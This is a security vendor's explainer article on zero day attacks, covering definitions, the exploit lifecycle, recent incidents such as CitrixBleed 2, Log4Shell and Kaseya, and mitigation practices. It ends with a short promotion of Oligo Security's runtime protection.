Zero Day Attack: Definition, Lifecycle, and 5 Devastating Examples

What Is a Zero Day Attack? 

A zero day attack is a cyberattack that exploits a previously unknown software vulnerability before the vendor or developer is aware of it and has a chance to create a patch. The term "zero day" signifies that the software vendor has "zero days" to respond and fix the issue before the attack happens. 

There are three common meanings of the term ‘zero day attack’. This article will focus on the last one:

• Zero day vulnerability: This is the security flaw in the software or hardware that is unknown to the vendor and the public. 
• Zero day exploit: This is the method or technique used by attackers to take advantage of the zero day vulnerability. 
• Zero day attack: This is the actual attack where the attacker uses the exploit to compromise a system or application. 

Examples of recent zero day attacks are CitrixBleed 2 (CVE‑2025‑5777), Nippon Steel Solutions data breach, Microsoft-zero-day-CVE‑2025‑29824, Commvault (Metallic) SaaS zero-day breach, Log4Shell, and the Kaseya attack (covered in more detail below).

To mitigate zero day attacks:

• Keep software and systems updated: While zero day vulnerabilities are unknown, regular updates can sometimes include fixes for related vulnerabilities or strengthen overall system security. 
• Use runtime detection and response: RDR tools can help identify vulnerabilities quickly and address them automatically, saving time and reducing the attack window.
• Implement a layered security approach: Employing multiple security measures like firewalls, intrusion detection/prevention systems, and endpoint protection can help mitigate the impact of an attack. 
• Use threat intelligence: Stay informed about known vulnerabilities and exploits through threat intelligence feeds and security advisories. 
• Educate users: Train users to be aware of phishing attempts and other social engineering tactics that can be used to deliver zero day exploits

Why Are Zero Day Attacks So Dangerous?

Zero day attacks are dangerous because they exploit vulnerabilities that are unknown to the software vendor or the public, leaving no immediate solution available. 

No Patch Available

When a zero day vulnerability is first discovered by attackers, there is no official fix or security update available. This creates a period where defenders have no direct way to close the security gap, and systems remain exposed. During this window, attackers can move quickly to compromise targets before a patch is released.

The absence of a patch also means that organizations must rely on temporary controls, such as restricting access or isolating vulnerable systems, which are often less effective than a permanent fix. This uncertainty makes zero day attacks especially difficult to contain in their early stages.

High Success Rate

Zero day exploits are effective because they target weaknesses that defenders do not yet know exist. Traditional security tools operate on known patterns and signatures, but zero day attacks do not match these patterns, allowing them to bypass detection. As a result, attackers can compromise systems with a higher probability of success compared to attacks against known vulnerabilities.

In addition, the secrecy around zero day vulnerabilities increases their value on black markets and within nation-state operations. This leads to rapid weaponization, where attackers quickly develop and distribute exploits, giving them an edge over defenders who are still unaware of the threat.

Potential for Widespread Impact

If a zero day vulnerability exists in widely used software, such as an operating system or a critical application, the number of potential victims can be very high. Attackers can scale their operations quickly, targeting individuals, enterprises, and government systems alike. A single exploit can be reused across thousands of organizations with little effort.

Beyond immediate compromise, attackers can use the exploit to install backdoors or maintain hidden access within networks. This persistence enables long-term surveillance, data theft, or sabotage, multiplying the overall damage. The scale and stealth of these attacks make them especially dangerous to critical infrastructure and large organizations.

Zero Day Exploit Lifecycle 

Here’s an overview of the typical process of identifying and addressing zero day attacks.

1. Discovery and Disclosure

Zero day exploits begin with the discovery of a vulnerability by a security researcher, hacker, or malicious actor. In some cases, ethical researchers will responsibly disclose the bug to the affected vendor, giving them time to craft a patch and inform users. 

However, not every discovery is handled ethically—many vulnerabilities are sold on black markets or used in secret to maximize their impact before public disclosure. The decision made at this stage—whether to disclose, sell, or exploit—shapes the entire lifecycle of the zero day.

Disclosure can be a complex ethical and strategic standpoint, as disclosing too soon may tip off attackers before a patch exists, while withholding information can lead to massive security breaches. 

Vendors often work quickly, under tight secrecy, to verify reports and develop fixes once they are notified. Meanwhile, organizations without prior knowledge remain exposed, and any delay in disclosure or patch development keeps the window open for misuse by malicious actors.

2. Weaponization and Testing

Once a vulnerability is discovered, attackers may rapidly develop a proof-of-concept or a working exploit, turning the bug into a practical weapon. This process, termed weaponization, involves creating malicious payloads, custom malware, or tailored scripts that leverage the vulnerability for unauthorized access, privilege escalation, or code execution. 

Cybercriminals may then test the exploit in controlled environments to ensure reliability and evade detection by security controls. Weaponized zero days often undergo rigorous testing against different software versions, configurations, and security products to maximize their success rate. 

Skilled threat actors will modify their exploits to bypass antivirus signatures, sandbox environments, and endpoint protection tools, often adding obfuscation or stealth techniques. This testing stage ensures that once deployed in the wild, the exploit is both effective and difficult to detect, increasing the likelihood of a successful attack before remediation is available.

3. Window of Vulnerability

The period from the initial exploitation of a zero day vulnerability until the publisher issues a patch is known as the window of vulnerability. During this time, all users of the affected software remain at significant risk, as there are no official mitigations or workarounds. 

Attackers take advantage of this gap to breach systems, steal data, and achieve persistence within compromised environments before defenses can be established. For organizations, this window creates significant operational risks, as systems are exposed without a clear protection strategy. 

Incident response efforts may focus on detecting indicators of compromise, isolating affected assets, or applying temporary mitigations. However, with highly targeted zero day attacks, victims may not become aware of the intrusion until long after the exploit has been used, allowing attackers to remain hidden and achieve their objectives unimpeded.

4. Propagation in Real-World Environments

When a zero day exploit is released or discovered to be in use, it can propagate rapidly across targets worldwide, especially if it is easily automatable or integrated into malware toolkits. Attackers may leverage phishing, drive-by downloads, or compromised websites to distribute the exploit, resulting in large-scale breaches. 

High-value targets, such as businesses, government agencies, and infrastructure providers, are especially vulnerable due to the critical systems and sensitive data they manage. Propagation is further enabled by the lack of available signatures and behavioral profiles for the exploit during the initial stages. 

Once security researchers and vendors learn of active exploitation, malware samples and attack vectors can be analyzed for detection. However, the initial wave of infections often goes undetected, creating widespread impact before security updates and public awareness catch up. The scale and efficiency of propagation make containment and remediation urgent priorities.

{{expert-tip}}

Examples of Zero Day Attacks 

CitrixBleed 2 (CVE‑2025‑5777)

CitrixBleed 2 is a critical zero day vulnerability in Citrix NetScaler ADC and NetScaler Gateway appliances that allows attackers to extract sensitive memory contents without authentication. Tracked as CVE-2025-5777, the flaw stems from insufficient input validation, enabling a memory overread attack that can reveal session tokens, user credentials, and other sensitive data.

Discovered in mid-June 2025, reports of active exploitation emerged within weeks. Security firms including ReliaQuest, Horizon3.ai, and Akamai observed widespread scanning and exploitation attempts, prompting CISA to add the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. Notably, CISA issued an unusually short 24-hour deadline for federal agencies to patch affected systems, underscoring the urgency and severity of the threat.

Despite Citrix releasing a patch, many systems remain unpatched, giving attackers a window of opportunity to compromise networks. The vulnerability's resemblance to the original CitrixBleed has led researchers to warn of repeat risks, particularly given the extensive use of Citrix appliances in enterprise environments.

Nippon Steel Solutions Data Breach

In March 2025, Nippon Steel Solutions, a subsidiary of Nippon Steel, discovered unauthorized activity on its servers linked to a zero day vulnerability in unspecified network equipment. The attackers exploited the flaw to access internal systems and exfiltrate data related to customers, partners, and employees.

Customer data included names, company affiliations, job titles, and contact information. Employee records and partner contact details were also potentially exposed. Although the company reported no confirmed data leaks on the dark web, the possibility of exfiltration remains under investigation.

The incident follows earlier claims by the BianLian ransomware group of stealing hundreds of gigabytes of data from Nippon Steel USA, though it’s unclear whether the two events are connected. Nippon Steel has not confirmed BianLian’s involvement, and the zero day exploited in the March breach remains unidentified publicly.

Microsoft-Zero-Day-CVE‑2025‑29824

CVE-2025-29824 is a zero day vulnerability in the Windows Common Log File System (CLFS) exploited by the threat group Storm-2460 in targeted ransomware attacks. The flaw enables privilege escalation, allowing attackers to gain system-level access from a standard user account. This access can be used to install malware, disable security features, and move laterally across networks.

Microsoft observed the vulnerability being used in attacks against sectors in the U.S., Venezuela, Spain, and Saudi Arabia. Victims included IT firms, financial institutions, and retail operations. The exploit was deployed using PipeMagic malware and affected a wide range of Windows environments, including critical infrastructure.

CLFS vulnerabilities have become a recurring target for attackers, especially ransomware operators. According to Microsoft and independent researchers, these types of flaws have become more popular for zero day exploitation due to their ability to provide deep system access without relying on remote code execution.

Commvault (Metallic) SaaS Zero-Day Breach

A zero day vulnerability in Commvault’s Metallic SaaS platform, CVE-2025-3928, has been exploited in a campaign targeting cloud-based data protection environments. The flaw, located in the Commvault Web Server, allowed remote authenticated attackers to access sensitive configuration data, including Microsoft 365 application secrets stored by Metallic.

CISA confirmed that nation-state actors used this vulnerability to access customer environments, warning that the compromise could extend to other SaaS platforms using similar configurations. The agency emphasized that the attackers could exploit default settings and over-permissive access rights to escalate their control across cloud infrastructure.

Commvault responded by releasing patches across multiple product versions for Windows and Linux. CISA added the flaw to its KEV catalog and advised organizations to monitor for indicators of compromise, audit cloud access permissions, and review application configurations to reduce exposure to similar supply chain threats.

Log4Shell

The Log4Shell vulnerability, discovered in late 2021, targeted Apache’s Log4j logging library—a component found in millions of Java applications across the globe. Attackers exploited this vulnerability using specially crafted log messages, taking advantage of Log4j’s logging features to execute arbitrary code remotely. 

The impact was immediate and severe, as anyone using vulnerable versions of Log4j was exposed to remote code execution without any authentication. Once revealed, Log4Shell quickly became one of the most exploited zero day vulnerabilities, affecting organizations from major enterprises to cloud service providers. 

The cross-cutting dependence on Log4j in software supply chains magnified the risk, requiring massive, coordinated patching efforts worldwide. Log4Shell illustrated the broader risk posed by deeply embedded open-source components and the far-reaching effects a single zero day vulnerability can have on the software ecosystem.

Kaseya Attack

In July 2021, cybercriminals exploited a zero day vulnerability in the Kaseya VSA software, a platform used by managed service providers to manage client IT systems. Attackers weaponized the vulnerability to deploy ransomware on thousands of downstream customer endpoints in a supply chain attack. 

The rapid escalation and scale were enabled by the centralized nature of Kaseya’s platform, which allowed a single breach to propagate ransomware across multiple organizations in a matter of hours. The Kaseya attack demonstrated how zero day vulnerabilities in remote management tools can have an outsized impact due to their privileged access across customer environments. 

Attackers leveraged the window before detection and patching to demand ransoms, lock critical data, and disrupt operations for organizations globally. The incident underscores the supply chain risk inherent in widely deployed administrative and management solutions, especially those with internet-facing components and broad access privileges.

Best Practices for Mitigating Zero Day Attacks 

Here are some of the ways that organizations can protect themselves from the impact of zero day attacks.

1. Use Runtime Detection and Response

Runtime detection and response tools help mitigate the threat of zero day attacks by focusing on suspicious behaviors that could indicate an exploit, even when the attack signature is unknown. These systems monitor the execution of software at runtime, detecting anomalies such as unauthorized file access, unexpected memory changes, or abnormal network traffic. 

These systems can recognize the indicators of exploitation attempts, such as privilege escalation or the use of malicious payloads, that might otherwise fly under the radar of traditional security tools. Runtime detection and response tools can actively respond to potential threats by quarantining or terminating suspicious processes, blocking further attacks, or triggering alerts for investigation. 

Unlike signature-based approaches, runtime detection and response provides an adaptive layer of protection that does not rely on prior knowledge of the attack vector. The use of machine learning and artificial intelligence allows for continuous improvement in detection capabilities.

2. Threat Modeling and Profiling

Threat modeling helps organizations identify the potential attack paths an adversary might use to exploit unknown vulnerabilities. By systematically analyzing system architecture, software dependencies, and data flows, security teams can anticipate how zero day exploits could be introduced or abused. This includes identifying high-risk assets, understanding trust boundaries, and documenting how different components interact.

Profiling complements this by establishing baselines of normal behavior for users, applications, and network activity. By understanding what “normal” looks like, deviations—such as unexpected communication patterns, unusual privilege usage, or abnormal process behavior—can be flagged for further inspection. Behavioral baselining enables early detection of exploitation attempts, even if the specific vulnerability is unknown.

Integrating threat modeling and profiling into development and security workflows helps prioritize protections around critical assets and likely attack vectors. These practices inform security design decisions, guide incident response planning, and help organizations stay resilient in the face of unknown threats by focusing defenses where they matter most.

3. Implement a Layered Security Approach

A layered security approach (or defense-in-depth) recognizes that relying on a single line of defense is insufficient when dealing with zero day attacks. Instead, it employs multiple security layers to protect assets, so even if one layer fails, others can still provide defense. 

For example, network security can be strengthened by using firewalls, intrusion detection/prevention systems (IDS/IPS), and segmentation, which limits the movement of attackers within the network if a zero day exploit is used to gain initial access.

Endpoint security tools such as antivirus software, behavioral monitoring, and endpoint detection and response (EDR) systems add another layer of defense, looking for malicious activity that may arise from an exploited vulnerability. Additionally, identity and access management (IAM) practices, such as multi-factor authentication (MFA) and the principle of least privilege, can limit the damage an attacker can cause if they gain initial access.

4. Use Proactive Threat Intelligence

Threat intelligence assists in staying ahead of zero day threats by providing organizations with actionable information about emerging vulnerabilities, attack techniques, and threat actor behaviors. By subscribing to threat intelligence feeds and partnering with threat-sharing organizations, businesses can access early warnings about potential zero day exploits. 

This intelligence can be integrated into security operations centers (SOCs) to help detect unusual activities or preemptively block attack techniques, such as phishing campaigns or exploit kits targeting zero day vulnerabilities. Threat intelligence can also be used to tailor vulnerability management efforts, ensuring that resources are focused on addressing the most critical and relevant threats. 

Threat intelligence platforms often provide data about known threat actors and their tactics, which can help organizations prepare for attack campaigns. When used effectively, proactive threat intelligence allows security teams to adapt quickly to emerging risks and prioritize their defense strategies before an attack is launched.

Zero Day Attack Protection with Oligo Security

Oligo delivers protection against zero-day attacks by monitoring open-source components in real time and understanding their actual runtime behavior. Instead of relying solely on static signatures, Oligo identifies and blocks only exploitable vulnerabilities in active code paths, dramatically reducing false positives. This runtime-aware approach ensures that even unknown or unpatched vulnerabilities are neutralized before they can be exploited.